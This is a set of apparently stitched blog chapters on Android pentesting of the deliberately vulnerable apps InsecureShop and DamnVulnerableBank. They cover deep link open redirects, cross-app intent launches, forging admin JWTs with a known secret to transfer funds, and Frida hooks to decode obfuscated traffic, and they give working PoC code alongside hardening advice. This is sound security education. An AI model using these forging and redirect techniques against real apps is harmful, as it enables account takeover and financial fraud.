The code snippet is responsible for managing the WebView in the application, specifically handling different URI paths and loading URLs. Let&apos;s break down the functionality and discuss potential security implications.

1.  **URI Handling**:
    -   The code first checks the URI path provided in the intent. It distinguishes between two specific paths: `/web` and `/webview`.
    -   If the path is `/webview`, the code retrieves the `url` query parameter from the intent&apos;s data using `getQueryParameter(&quot;url&quot;)`.
2.  **Domain Validation**:
    -   The application checks if the extracted URL ends with the domain `insecureshopapp.com`. This check aims to ensure that the URL belongs to a trusted domain.
    -   If the URL passes this domain validation, it is assigned to the `data` variable.
3.  **WebView Loading**:
    -   If the `data` variable is not `null`, the URL is loaded into the WebView using `webview.loadUrl(data);`.
    -   Additionally, the URL is saved in the application preferences using `Prefs.INSTANCE.getInstance(this).setData(data);`.

The code&apos;s domain validation only checks whether the URL string ends with `insecureshopapp.com`; the host of the URL is never inspected. An attacker can therefore craft a URL such as `http://malicious-site.com?url=http://insecureshopapp.com`, whose raw string ends with the trusted suffix even though it points at an attacker-controlled host. This yields an open redirect vulnerability, where the user can be sent to a malicious site, potentially compromising their data or security.
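
To make the weakness concrete, this small stand-alone Java sketch reproduces the suffix check and shows which URLs it accepts. The check mirrors the decompiled logic; the attacker URLs are illustrative:

```java
public class SuffixCheckBypass {

    // Reproduces the app&apos;s naive validation: trust any URL whose raw
    // string ends with the expected domain
    static boolean naiveCheck(String url) {
        return url != null &amp;&amp; url.endsWith(&quot;insecureshopapp.com&quot;);
    }

    public static void main(String[] args) {
        // Intended case
        System.out.println(naiveCheck(&quot;https://www.insecureshopapp.com&quot;)); // true
        // Bypass: the trusted string appears only in a query parameter
        System.out.println(naiveCheck(&quot;http://malicious-site.com?url=http://insecureshopapp.com&quot;)); // true
        // Bypass: lookalike registered domain
        System.out.println(naiveCheck(&quot;https://attacker-insecureshopapp.com&quot;)); // true
    }
}

```

All three calls return `true`, even though only the first URL actually belongs to the trusted domain.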

## Dynamic Analysis

At this point, we have a solid understanding of how deeplinks are handled within the application, so let&apos;s proceed to exploit the vulnerability. We will create a webpage containing a link under our control that the victim needs to click. The link is a specially crafted deeplink that triggers the vulnerable activity in the InsecureShop application, causing the app to load a URL of our choosing and potentially redirecting the user to a malicious site or triggering other unintended actions within the app.

![](/content/images/2024/07/image-14.png)

Attack Diagram

With this purpose in mind, I&apos;ll use the following HTML code for the webpage. As you can see, it simply displays a GIF of Pikachu. However, when the user clicks on this GIF, they will be redirected to the insecureShop application via a deeplink.

```html
&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
&lt;head&gt;
    &lt;meta charset=&quot;UTF-8&quot;&gt;
    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;
    &lt;title&gt;Super Secure Site&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
        &lt;h1&gt;Click Here!&lt;/h1&gt;
    &lt;a href=&quot;insecureshop://com.insecureshop/web?url=https://kayssel.com&quot;&gt;
        &lt;img src=&quot;https://i.pinimg.com/originals/1f/0b/85/1f0b85bb750807778b1fe2444527fbd2.gif&quot; alt=&quot;Pikachu GIF&quot; width=&quot;200&quot;&gt;
    &lt;/a&gt;
&lt;/body&gt;
&lt;/html&gt;

```

In this example, the `a` tag contains a link with a custom URI scheme (`insecureshop://`) intended to trigger the InsecureShop application. The `url` parameter points to the attacker-controlled site (`https://kayssel.com`, my own site standing in for a malicious one). When a user clicks the Pikachu GIF, this URL is loaded within the InsecureShop app, demonstrating how an open redirect can be exploited to direct users to potentially harmful sites.

![](/content/images/2024/07/image-16.png)

Evidence of the vulnerable application

## Cross App Attacks

This Proof of Concept (PoC) demonstrates how to exploit the vulnerability through an open redirect. However, other types of attacks are also possible. For instance, an attacker could create another mobile application designed to launch the vulnerable activity in the InsecureShop app. This is known as a &quot;Cross-App&quot; attack and operates in a similar manner.

In a Cross-App attack, the malicious app triggers the deeplink in the target application, potentially leading users to malicious websites or extracting sensitive data. This attack leverages the fact that deeplinks can be invoked by external applications, making it a powerful vector for exploitation.

There are two ways to simulate this attack. The first method, which is the most realistic, involves creating another app using Java. However, this approach is time-consuming and will not be demonstrated here. Nonetheless, here&apos;s a basic example of how such an implementation might look:

```java

import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;

public class LaunchDeeplinkActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        // The deeplink URL to trigger
        String deeplinkUrl = &quot;insecureshop://com.insecureshop/web?url=https://malicious-site.com&quot;;

        // Create an intent to trigger the deeplink
        Intent intent = new Intent(Intent.ACTION_VIEW);
        intent.setData(Uri.parse(deeplinkUrl));

        // Check if the intent can be handled
        if (intent.resolveActivity(getPackageManager()) != null) {
            startActivity(intent);
        } else {
            // Handle the situation where the app is not installed or cannot handle the deeplink
            System.out.println(&quot;No application can handle this intent.&quot;);
        }

        // Optionally finish the activity if no UI is needed
        finish();
    }
}

```

The second method involves simulating the attack using ADB, which is quicker and more practical for our demonstration purposes. The following ADB command can be used to trigger the same Deeplink from a connected device or emulator:

```bash
adb shell am start -W -a android.intent.action.VIEW -d &quot;insecureshop://com.insecureshop/web?url=https://kayssel.com&quot;

```

![](/content/images/2024/08/image.png)

ADB starting the new activity

![](/content/images/2024/08/image-1.png)

Webpage loaded into the webview

This command starts an intent with the action `android.intent.action.VIEW` and the specified data URI. It effectively simulates the deeplink being triggered by another application or a browser. This approach is particularly useful for testing and demonstrating vulnerabilities without the need to develop a separate app.

# Securing Deep Links in Android

After exploring how deep links work and understanding the various attacks that can exploit them, let&apos;s now focus on how to secure them effectively. Here are two critical strategies to ensure secure deep link handling:

**Validate and Sanitize URL Parameters**: Ensure all parameters extracted from deep links are validated and sanitized to prevent injection attacks. This involves checking that the URL parameters conform to expected formats and originate from trusted sources.

```java
Uri data = intent.getData();
if (data != null) {
    String url = data.getQueryParameter(&quot;url&quot;);
    // Parse the URL and compare scheme and host exactly. A prefix check such as
    // url.startsWith(&quot;https://trusted-domain.com&quot;) is NOT enough: it would also
    // accept &quot;https://trusted-domain.com.evil.com&quot;.
    Uri parsed = (url != null) ? Uri.parse(url) : null;
    if (parsed != null
            &amp;&amp; &quot;https&quot;.equals(parsed.getScheme())
            &amp;&amp; &quot;trusted-domain.com&quot;.equals(parsed.getHost())) {
        webview.loadUrl(url);
    } else {
        webview.loadUrl(&quot;https://trusted-domain.com/error&quot;);
    }
}

```

**Use Strict Intent Filters**: Configure intent filters narrowly in the `AndroidManifest.xml` to limit which URLs can trigger activities. This reduces the risk of unauthorized deep links activating sensitive parts of your app.

```xml
&lt;activity android:name=&quot;.DetailActivity&quot;&gt;
    &lt;intent-filter&gt;
        &lt;action android:name=&quot;android.intent.action.VIEW&quot;/&gt;
        &lt;category android:name=&quot;android.intent.category.DEFAULT&quot;/&gt;
        &lt;category android:name=&quot;android.intent.category.BROWSABLE&quot;/&gt;
        &lt;data android:scheme=&quot;myapp&quot; android:host=&quot;details&quot;/&gt;
    &lt;/intent-filter&gt;
&lt;/activity&gt;


```
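
A related hardening step worth mentioning: since Android 12 (API 31), any activity that declares an intent filter must also declare `android:exported` explicitly, and activities that are not meant to receive deep links should set it to `false`. A sketch of the same filter with the attribute spelled out:

```xml
&lt;!-- android:exported=&quot;true&quot; is required for an activity that receives
     deep links; keep every other activity android:exported=&quot;false&quot; --&gt;
&lt;activity android:name=&quot;.DetailActivity&quot; android:exported=&quot;true&quot;&gt;
    &lt;intent-filter&gt;
        &lt;action android:name=&quot;android.intent.action.VIEW&quot;/&gt;
        &lt;category android:name=&quot;android.intent.category.DEFAULT&quot;/&gt;
        &lt;category android:name=&quot;android.intent.category.BROWSABLE&quot;/&gt;
        &lt;data android:scheme=&quot;myapp&quot; android:host=&quot;details&quot;/&gt;
    &lt;/intent-filter&gt;
&lt;/activity&gt;

```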

# Conclusions

In this chapter, we delved into the workings of deep links in Android, highlighting their power to direct users to specific content within an app. We examined the two main types of deep links, Traditional Deep Links and App Links, and learned how they enhance user experience by providing seamless navigation to app-specific content.

However, with these conveniences come potential security risks. We explored various vulnerabilities associated with deep links, such as open redirects and cross-app attacks, and demonstrated how these can be exploited through both static and dynamic analysis. Using the &quot;InsecureShop&quot; app as a case study, we illustrated how attackers could manipulate improperly configured deep links to compromise user data and application integrity.

To mitigate these risks, we emphasized the importance of securing deep links through rigorous validation and sanitization of URL parameters, the use of strict intent filters, and implementing user confirmations for actions leading outside the app. Ensuring all URLs use HTTPS further protects against man-in-the-middle attacks, and regularly reviewing and updating security practices helps keep vulnerabilities at bay.

# Resources

-   Insecure Shop: An Introduction to Android App Exploitation. &quot;HackMD.&quot; Available at: [https://hackmd.io/@avila-pwn-notes/HyB1KnK7c](https://hackmd.io/@avila-pwn-notes/HyB1KnK7c)
-   OWASP Mobile Application Security Testing Guide (MASTG) - Deep Link Testing. &quot;OWASP.&quot; Available at: [https://mas.owasp.org/MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/#static-analysis](https://mas.owasp.org/MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/#static-analysis)
-   Tell Your Phone to Link Me at the Coffee Shop. &quot;KnifeCoat.&quot; Available at: [https://knifecoat.com/Posts/Tell+you+phone+to+link+me+at+the+coffee+shop](https://knifecoat.com/Posts/Tell+you+phone+to+link+me+at+the+coffee+shop)
-   Android Deep Links Exploitation. &quot;Z4ki Medium.&quot; Available at: [https://z4ki.medium.com/android-deep-links-exploitation-4abade4d45b4](https://z4ki.medium.com/android-deep-links-exploitation-4abade4d45b4)
-   Android Developers Guide - Deep Links. &quot;Android Developers.&quot; Available at: [https://developer.android.com/training/app-links/deep-linking](https://developer.android.com/training/app-links/deep-linking)
-   Security Best Practices for WebView. &quot;Android Developers.&quot; Available at: [https://developer.android.com/guide/webapps/webview#best-practices](https://developer.android.com/guide/webapps/webview#best-practices)
-   Jadx - Dex to Java Decompiler. &quot;GitHub.&quot; Available at: [https://github.com/skylot/jadx](https://github.com/skylot/jadx)
-   APKX - APK Decompiler. &quot;GitHub.&quot; Available at: [https://github.com/b-mueller/apkx](https://github.com/b-mueller/apkx)</content:encoded><author>Ruben Santos</author></item><item><title>Mastering Android Activity Hacking: Techniques and Tools</title><link>https://www.kayssel.com/post/android-5</link><guid isPermaLink="true">https://www.kayssel.com/post/android-5</guid><description>This article explores using Objection to investigate and manipulate Android activities. It highlights uncovering hidden features, exploiting vulnerabilities like insecure JWTs, and the importance of securing applications to protect against significant security risks.</description><pubDate>Sun, 07 Jul 2024 10:01:20 GMT</pubDate><content:encoded># Introduction

In this article, we will delve into the exploration of activities within an Android application using Objection. Activities in Android are a crucial component, serving as the entry point for interacting with users. They represent individual screens with user interfaces, much like windows or pages in a web application. Each activity operates independently but can communicate with others to perform various tasks, such as displaying a list of emails or composing a new one in an email app.

Understanding activities is essential for Android development as they form the backbone of the user interface and user experience. However, activities also come with certain security risks. Intent spoofing, where malicious apps start or interact with activities in unintended ways, and data leakage, where sensitive information is improperly secured, are notable risks.

In this article, we will focus on how to investigate and manipulate activities using Objection. We will cover the following key points:

-   **Exploring Activities**: Launching Objection, listing, and examining activities within an application.
-   **Identifying Hidden Features**: Discovering and interacting with activities not available to regular users.
-   **Combining Vulnerabilities**: Using previously discussed JWT vulnerabilities to gain unauthorized access and perform administrative tasks.

By the end of this article, you will have a better understanding of how to use Objection to explore and manipulate activities within an Android application, as well as how to identify and exploit security vulnerabilities.

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    It is recommended to read the &lt;a href=&quot;https://www.kayssel.com/series/android/&quot;&gt;previous chapters&lt;/a&gt; of this series to fully understand the process discussed in this article. Prior knowledge of concepts such as JWT vulnerabilities and basic usage of Objection will be beneficial for following along with the demonstrations and explanations provided.
  &lt;/div&gt;
&lt;/div&gt;

# What Are Android Activities?

An activity in Android is a crucial component that serves as the entry point for interacting with the user. It represents a single screen with a user interface, akin to a window or a page in a web application. When you open an app, the first thing you typically see is an activity.

Each activity in an Android app is independent but can communicate with other activities to perform different tasks. For instance, an email app might have one activity for displaying a list of emails and another for composing a new email. These activities work together to provide a seamless user experience.

In technical terms, an activity is a subclass of the `Activity` class in the Android framework. Developers can override lifecycle methods such as `onCreate()`, `onStart()`, `onResume()`, `onPause()`, `onStop()`, and `onDestroy()` to manage how the activity behaves when it’s created, displayed, paused, stopped, and destroyed.

## Security-Related Risks of Activities in Android

While activities are essential for creating dynamic and interactive Android applications, they also come with certain security risks that developers should be aware of:

**Intent Spoofing**: Activities can be started by intents, and if not properly secured, malicious apps can exploit this to start or interact with activities in unintended ways. This can lead to unauthorized access to sensitive data.

**Data Leakage**: If activities handle sensitive information and do not properly secure it, there is a risk of leaking this data. For example, information can be exposed through logs, improperly secured intents, or unprotected public components.

In this article, I will demonstrate how vulnerabilities in activities, such as insecure JWTs, can be exploited. By combining these vulnerabilities, attackers can gain unauthorized access and perform administrative tasks, highlighting the critical need for robust security measures in Android applications.

# Step-by-Step Exploration with Objection

To begin using Objection for exploring the activities of an Android application, execute the following command:

```bash
objection -N -h 192.168.20.143 --gadget &quot;DamnVulnerableBank&quot; explore

```

![](/content/images/2024/07/image-1.png)

Launching objection

Once inside Objection, you can list all the different activities using the following command:

```bash
android hooking list activities

```

![](/content/images/2024/06/image-24.png)

Activity list

After this, to explore the various activities within the application, you can launch any of them directly. For example, to display the user&apos;s profile, you can use the following command:

```bash
android intent launch_activity com.app.damnvulnerablebank.Myprofile

```

![](/content/images/2024/07/image-2.png)

Launching MyProfile Activity

As you can see, this allows us to easily launch the different activities of the application.

Upon further inspection, we notice that some activities listed by Objection do not appear in the user interface for a regular user. One of them is labeled &quot;SendMoney&quot;. Let&apos;s investigate it by launching it:

```bash
android intent launch_activity com.app.damnvulnerablebank.SendMoney

```

![](/content/images/2024/06/image-25.png)

SendMoney Activity

This activity appears to allow money to be sent to arbitrary accounts by specifying the amount. However, if you enter your own account number (which you can find in the user profile) and an amount, you will encounter an error stating that you do not have sufficient permissions. It appears to be an administrator-only feature for sending money from the administrator&apos;s account.

![](/content/images/2024/06/image-26.png)

Account Number of my current user

So we have two vulnerabilities that, when combined, become a much bigger one: we can add our user to the admin&apos;s beneficiaries and then send money from the admin&apos;s account to our own. We will be able to do this thanks to the vulnerability in the JWT that we found in a [previous chapter](https://www.kayssel.com/post/android-3/) of the series.

Therefore, having this plan in mind, we must first add our user to the admin&apos;s beneficiaries. To add the user&apos;s account as a beneficiary, we must launch the corresponding functionality:

```bash
android intent launch_activity com.app.damnvulnerablebank.AddBeneficiary

```

After that, we need to enter our account number in the activity. Subsequently, capture the request with Burp in order to modify the JWT. Change the data so that the username is &quot;admin&quot; and set the &quot;is\_admin&quot; property to &quot;true&quot;. After this, use the JWT secret, which is &quot;secret&quot;, to recalculate the signature to a valid one.

![](/content/images/2024/06/image-28.png)

Capturing the add beneficiary request

![](/content/images/2024/06/image-29.png)

Changing the JWT values using the JWT editor of Burp
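
Instead of re-signing every request by hand in Burp, the forged admin token can also be computed directly. The following stand-alone Java sketch uses plain `javax.crypto`, assuming the HS256 secret `secret` recovered earlier; the claim names (`username`, `is_admin`) mirror the ones shown above and should be adjusted to whatever the real payload contains:

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public class JwtForge {

    // Build an HS256-signed admin token using the leaked secret
    public static String forge(String secret) {
        try {
            Base64.Encoder b64 = Base64.getUrlEncoder().withoutPadding();
            String header = b64.encodeToString(
                    &quot;{\&quot;alg\&quot;:\&quot;HS256\&quot;,\&quot;typ\&quot;:\&quot;JWT\&quot;}&quot;.getBytes(StandardCharsets.UTF_8));
            String payload = b64.encodeToString(
                    &quot;{\&quot;username\&quot;:\&quot;admin\&quot;,\&quot;is_admin\&quot;:true}&quot;.getBytes(StandardCharsets.UTF_8));
            String signingInput = header + &quot;.&quot; + payload;

            // Signature = HMAC-SHA256(secret, header.payload), base64url-encoded
            Mac mac = Mac.getInstance(&quot;HmacSHA256&quot;);
            mac.init(new SecretKeySpec(secret.getBytes(StandardCharsets.UTF_8), &quot;HmacSHA256&quot;));
            String signature = b64.encodeToString(
                    mac.doFinal(signingInput.getBytes(StandardCharsets.UTF_8)));

            return signingInput + &quot;.&quot; + signature;
        } catch (java.security.GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(forge(&quot;secret&quot;));
    }
}

```

The printed token can then be pasted into the `Authorization` header of a request, or stored as described in the callout below about the app&apos;s shared preferences.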

Once you&apos;ve done that, launch the &quot;Pending Beneficiary&quot; activity to accept our user as an admin beneficiary. Remember, you&apos;ll need to modify the JWT of the request in Burp because this action can only be performed by an administrator user.

```bash
android intent launch_activity com.app.damnvulnerablebank.PendingBeneficiary

```

![](/content/images/2024/06/image-30.png)

Request to access the pending beneficiary activity

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    If you want, you can create an admin JWT and insert it into the following file: `/data/user/0/com.app.damnvulnerablebank/shared_prefs/jwt.xml`. This will let you access the app as an admin user and allow you to navigate more easily through the application. Otherwise, you will need to change each JWT of each request using Burp to set it as an admin.
  &lt;/div&gt;
&lt;/div&gt;

After clicking on the relevant section for your user account, you&apos;ll be prompted to enter the operation ID to confirm it. In my case, the ID was &quot;4&quot;.

![](/content/images/2024/06/image-32.png)

Pending beneficiary activity

Once the account has been approved as a beneficiary, the &quot;ViewBeneficiary&quot; activity should display something akin to the following:

```bash
android intent launch_activity com.app.damnvulnerablebank.ViewBeneficiary

```

![](/content/images/2024/06/image-33.png)

ViewBeneficiary Activity

This evidence indicates that our user account is now a beneficiary of the administrator&apos;s account. Consequently, the SendMoney activity can be used to transfer funds to it.

```bash
android intent launch_activity com.app.damnvulnerablebank.SendMoney

```

![](/content/images/2024/06/image-35.png)

Sending money to our user account

At last, we can verify that the figure displayed in our profile has been updated to &quot;10050&quot; rather than &quot;10000&quot;.

![](/content/images/2024/07/image.png)

Evidence that our user&apos;s money has increased by 50.

# Conclusions

In this article, we explored how to use Objection to investigate and manipulate activities within an Android application. By understanding Android activities and leveraging tools like Objection, we uncovered hidden features and potential security vulnerabilities.

We demonstrated how to interact with various activities, identify those not accessible to regular users, and exploit vulnerabilities such as insecure JWTs to gain unauthorized access. This highlights the importance of thoroughly testing and securing applications to protect against combined vulnerabilities that pose significant security risks.

# References

-   Android Developer Documentation: Activities. &quot;Android Developers.&quot; Available at: [https://developer.android.com/guide/components/activities/](https://developer.android.com/guide/components/activities/)
-   Objection Documentation. &quot;Objection Documentation.&quot; Available at: [https://github.com/sensepost/objection](https://github.com/sensepost/objection)
-   Burp Suite Documentation. &quot;Burp Suite Documentation.&quot; Available at: [https://portswigger.net/burp/documentation](https://portswigger.net/burp/documentation)
-   OWASP Mobile Security Testing Guide. &quot;OWASP Mobile Security Testing Guide.&quot; Available at: [https://owasp.org/www-project-mobile-security-testing-guide/](https://owasp.org/www-project-mobile-security-testing-guide/)
-   Android Security: Exploiting Intent Spoofing. &quot;OWASP Intent Spoofing.&quot; Available at: [https://www.owasp.org/index.php/Intent_Spoofing](https://www.owasp.org/index.php/Intent_Spoofing)
-   InsecureBankv2: A Vulnerable Android Application for Security Testing. &quot;InsecureBankv2.&quot; Available at: [https://github.com/dineshshetty/Android-InsecureBankv2](https://github.com/dineshshetty/Android-InsecureBankv2)</content:encoded><author>Ruben Santos</author></item><item><title>Cracking the Code: Exploring Reverse Engineering and MobSF for Mobile App Security</title><link>https://www.kayssel.com/post/android-4</link><guid isPermaLink="true">https://www.kayssel.com/post/android-4</guid><description>In this chapter, we decoded server responses through APK reverse engineering, uncovering obfuscation techniques. We also introduced MobSF for automated security analysis, identifying vulnerabilities and enhancing the security posture of mobile applications.</description><pubDate>Sun, 23 Jun 2024 12:30:18 GMT</pubDate><content:encoded># Introduction

[In our previous discussions](https://www.kayssel.com/post/android-3/), we delved into the theoretical aspects of forging new JWTs after compromising their signing secret. We still faced a challenge, however: the server&apos;s responses were encoded, and the front end of the application displayed no information, leaving us in the dark about the underlying issues. In this chapter, we aim to decode the server&apos;s responses by examining the application&apos;s code. Additionally, we will introduce MobSF (Mobile Security Framework) as a robust tool for performing automated security analysis of mobile applications. This comprehensive approach will help us gain deeper insights into the application&apos;s behavior and enhance its security posture.

Key takeaways from this chapter include:

-   **Decoding Server Responses:** Understanding how to decode the encoded server responses to uncover vital information.
-   **Reverse Engineering APKs:** Techniques to extract and analyze the Java code from APK files.
-   **Understanding Obfuscation:** Insights into obfuscation techniques used in encoding and decoding data.
-   **Using Frida for Dynamic Analysis:** Leveraging Frida scripts to intercept and analyze data in real-time.
-   **Utilizing MobSF:** Introducing MobSF as a powerful tool for static and dynamic analysis of mobile applications.

# Reverse Engineering

The first thing we need to do to study the application&apos;s code is to obtain the Java code from the APK. To achieve this, we can use apkx, just as we did in the [first chapter](https://www.kayssel.com/post/android-1/) of this series.

[GitHub - muellerberndt/apkx](https://github.com/muellerberndt/apkx)

```bash
apkx dvba-no-gpu.apk

```

After obtaining the code, we need to search for the `Profile` class to try to understand what is happening.

![](/content/images/2024/06/image-9.png)

Searching for the profile class

Once we have found the class, we can perform a bit of reverse engineering to discover that the class containing the code to encode the data is `e`.

![](/content/images/2024/06/image-1.png)

Encode method

![](/content/images/2024/06/image-3.png)

Package with the methods that encode the data

The class `e` provides functionality to encode and decode strings using Base64, with an added layer of obfuscation. The obfuscation is achieved by XOR-ing each character of the input string with a repeating sequence of characters from the word `&quot;amazing&quot;`.

1.  **`a` method**: Decodes a Base64 encoded string and then reverses the XOR obfuscation (used for incoming responses).
2.  **`b` method**: Applies the XOR obfuscation to a string and then encodes it in Base64 (used for outgoing requests).
3.  **`c` method**: Performs the XOR operation itself; since XOR is its own inverse, the same routine both obfuscates and de-obfuscates.

We can deduce that the encoded data is built by first XOR-ing the plaintext with the key `&quot;amazing&quot;` and then Base64-encoding the result; decoding simply reverses the process (Base64-decode, then XOR).

![](/content/images/2024/06/image-2.png)

Class `e`
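
The deduced scheme can be replicated outside the app in a few lines of Python. This is a minimal sketch under that assumption (XOR with the repeating key `&quot;amazing&quot;`, then Base64); the function names here are our own, not the app&apos;s:

```python
import base64

KEY = b"amazing"  # repeating XOR key recovered from class e

def xor_with_key(data: bytes) -> bytes:
    # XOR is its own inverse, so one routine covers both directions
    return bytes(b ^ KEY[i % len(KEY)] for i, b in enumerate(data))

def encode(plaintext: str) -> str:
    # Mirrors method b: XOR first, then Base64
    return base64.b64encode(xor_with_key(plaintext.encode())).decode()

def decode(encoded: str) -> str:
    # Mirrors method a: Base64-decode first, then XOR
    return xor_with_key(base64.b64decode(encoded)).decode()
```

A quick round-trip check (`decode(encode(s)) == s`) confirms the two directions are consistent before pointing the decoder at real responses.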

With this information, we can develop a Frida script that prints both the encoded data and the decoded data:

```javascript
// Delay execution to ensure proper Java environment setup
setTimeout(function() {
    Java.perform(function() {
        var CryptClass = Java.use(&quot;c.b.a.e&quot;); // Locate the obfuscated class c.b.a.e

        // Hook method &apos;a&apos; (Base64-decode + XOR) to log server responses
        CryptClass.a.implementation = function(encodedData) {
            console.log(&quot;Encoded Data: &quot; + encodedData); // Log encoded data
            var responseData = this.a(encodedData); // Execute original method
            console.log(&quot;Decoded Response: &quot; + responseData); // Log decoded response data
            return responseData; // Return the original method&apos;s result
        };

        // Hook method &apos;b&apos; (XOR + Base64-encode) to log outgoing requests
        CryptClass.b.implementation = function(requestData) {
            console.log(&quot;Request Data: &quot; + requestData); // Log plaintext request data
            var encodedRequest = this.b(requestData); // Execute original method
            console.log(&quot;Encoded Request: &quot; + encodedRequest); // Log encoded request data
            return encodedRequest; // Return the original method&apos;s result
        };
    });
}, 10); // Wait 10 ms before hooking
```

As you can see in the following image, when we enter the profile section of the application, Frida now reports both the encoded and decoded data.

![](/content/images/2024/06/image-4.png)

Encoded and decoded data

However, after changing the user&apos;s JWT, the hooked data stopped appearing in the Frida terminal. I therefore wrote a small Python script to decode the data manually: I take the encoded payload from a response captured after changing the JWT and decode it offline.

![](/content/images/2024/06/image-11.png)

&lt;details&gt;
&lt;summary&gt;Encoded data after changing the JWT to try to impersonate the user beru&lt;/summary&gt;

```bash
{&quot;enc_data&quot;:&quot;Gk8SDggaEhJPWwFLDQgFCENAW15XTU8MHxodBgYIQ0BLPRICDgQJGkwaTU8FGx0PRVsWQxgIAgYPDgRYU19XUV1RVksPBAICFBQdMQkUAAMfG0xdWFpXQ1pWS0MYEh8bAAYMCENASxwUBg8EFA4HJwYAABMFQAQOAENWSwcUPgwFFwAARVsLABYaCxoc&quot;}

```
&lt;/details&gt;


```python
import base64

def decode_base64_and_xor(encoded_string):
    &quot;&quot;&quot;
    Decodes a Base64 encoded string and then reverses the XOR
    obfuscation applied with the repeating key &quot;amazing&quot;.

    :param encoded_string: The Base64 encoded string.
    :return: The decoded plaintext string.
    &quot;&quot;&quot;
    # Decode the Base64 string to raw bytes. The XOR-ed payload is not
    # guaranteed to be valid UTF-8, so the XOR must be applied to the
    # bytes before decoding the result as text.
    decoded_bytes = base64.b64decode(encoded_string)

    # Apply the XOR operation with the repeating key &quot;amazing&quot;
    key = b&quot;amazing&quot;
    plain_bytes = bytes(b ^ key[i % len(key)] for i, b in enumerate(decoded_bytes))

    return plain_bytes.decode(&quot;utf-8&quot;)

# Example usage
if __name__ == &quot;__main__&quot;:
    encoded_string = &quot;your_encoded_string_here&quot;  # Replace this with your encoded string
    print(&quot;Decoded string:&quot;, decode_base64_and_xor(encoded_string))
```

As shown in the following image, we have successfully decoded the data and recovered the profile information of another user, `beru`.

![](/content/images/2024/06/image-5.png)

Profile data of the user beru

This application has a default admin user, so we can also try to find out their data. By changing the JWT username from `&quot;rsgbengi@gmail.com&quot;` to `&quot;admin&quot;` and setting `&quot;is_admin&quot;` to `&quot;true&quot;`, we can impersonate the admin user.
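
Since the signing secret (&quot;secret&quot;, cracked in the previous chapter) is known, the forging step can be sketched offline with nothing but the standard library. The claim names follow the token observed in the app; this is a sketch, not the implementation of any particular Burp plugin:

```python
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    # JWTs use unpadded base64url encoding for every segment
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_hs256_jwt(payload: dict, secret: str) -> str:
    # Build header.payload, then sign the pair with HMAC-SHA256
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url(json.dumps(payload).encode())
    signing_input = (header + "." + body).encode()
    signature = b64url(hmac.new(secret.encode(), signing_input, hashlib.sha256).digest())
    return header + "." + body + "." + signature

if __name__ == "__main__":
    # Impersonate the default admin user with the cracked secret
    token = forge_hs256_jwt({"username": "admin", "is_admin": "true"}, "secret")
    print(token)
```

Sending the forged token in place of the original one should return the admin user&apos;s (still encoded) profile data.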

![](/content/images/2024/06/image-13.png)

Impersonating the admin user

![](/content/images/2024/06/image-14.png)

Data of the admin user

# **Understanding MobSF: A Powerful Mobile Security Framework**

Moving on from the previous section where we discussed reverse engineering, let&apos;s now dive into what MobSF is and why it&apos;s an essential tool for mobile security.

## **What is MobSF?**

MobSF (Mobile Security Framework) is an open-source security framework designed to perform automated security analysis of mobile applications. It supports both Android and iOS platforms, making it a versatile tool for mobile app developers and security analysts alike. Whether you have an APK (Android Package) or an IPA (iOS App Store Package), MobSF can dissect it and provide detailed insights into its security posture.

**Key Features of MobSF:**

1.  **Static Analysis:** MobSF performs static analysis by decompiling the application code and inspecting it for vulnerabilities. This includes identifying insecure coding practices, potential data leaks, and other security flaws without executing the app.
2.  **Dynamic Analysis:** For a more in-depth assessment, MobSF can also run the app in a controlled environment to observe its behavior in real-time. This dynamic analysis helps in identifying runtime issues, such as network security concerns and improper use of APIs.
3.  **API Analysis:** MobSF examines the APIs used by the application to detect any insecure or outdated APIs that might expose the app to security risks.
4.  **Malware Analysis:** The framework includes malware analysis capabilities, allowing it to detect malicious code that could compromise the device or the data it handles.
5.  **User-Friendly Reports:** After completing its analysis, MobSF generates comprehensive and user-friendly reports. These reports highlight the identified vulnerabilities and provide recommendations for remediation, making it easier for developers to enhance the security of their applications.

### Installing MobSF with Docker

The process of installing MobSF (Mobile Security Framework) is quite easy, thanks to Docker. You only need to execute the following commands:

```bash
# Pulling the image
docker pull opensecurity/mobile-security-framework-mobsf:latest
# Running the docker container
docker run -it --name mobsf -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
```

### Steps to Install MobSF

1.  **Pull the MobSF Docker Image:** The first step is to pull the latest MobSF Docker image from the Docker repository. This can be done using the `docker pull` command:

```bash
docker pull opensecurity/mobile-security-framework-mobsf

```

2.  **Run the Docker Container:** Once the image is downloaded, you can run the MobSF Docker container. The `-it` flag runs the container in interactive mode, and the `-p 8000:8000` flag maps port 8000 on your local machine to port 8000 on the Docker container, making the MobSF web interface accessible via `http://localhost:8000`:

```bash
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest

```

## Starting Your First Scan

Once MobSF is installed and running, initiating your first scan is quite simple. Follow these steps:

1.  **Access the MobSF Web Interface:** Open your web browser and go to `http://localhost:8000`. Log in with the credentials:

```bash
Username: mobsf
Password: mobsf

```

![](/content/images/2024/06/image-15.png)

Log in into MobSF

2.  **Select &quot;Static Analyzer&quot;:** From the MobSF dashboard, navigate to the &quot;Static Analyzer&quot; option. This tool allows you to perform a comprehensive analysis of your APK.

![](/content/images/2024/06/image-21.png)

